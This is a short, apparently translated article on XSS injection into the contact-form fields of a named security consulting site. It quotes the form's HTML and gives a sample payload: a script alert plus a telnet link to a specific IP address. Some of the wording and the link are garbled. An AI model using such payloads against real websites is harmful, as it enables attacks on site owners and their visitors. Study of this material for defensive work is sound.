Author: Aditya K Sood
Translator: riusksk (quange)
Vulnerability Analysis
This article introduces XSS injection attacks in different fields. XSS cheatsheat is not used here. Now let's start to analyze it in detail. The target of this instance is the SecTheory security consulting site. This process uses two different methods, which will make some security companies less invasive and facilitate the establishment of new exploitation types. The results are the same, but the methods are different.
Hackers seek for security vulnerabilities and use them to launch website attacks. I am always used to the following two methods:
1. URL Banging: inject input parameters into the URL.
2. Form Splitting: inject forged parameters into form.
Key code:
<Input type = "TEXT" NAME = "login" style = "width: 300px" MAXLENGTH = "100">
<Div id = "contact" align = "right">
Your phone number:
<Input type = "TEXT" NAME = "number" style = "width: 300px" MAXLENGTH = "100">
<Div id = "contact" align = "right">
Your email address:
<Input type = "TEXT" NAME = "email" style = "width: 300px" MAXLENGTH = "100">
.....
Inject the following code
<Script> alert ("XSS"); </script> <a href = "TELNETtelnet: // 203.197.219.33">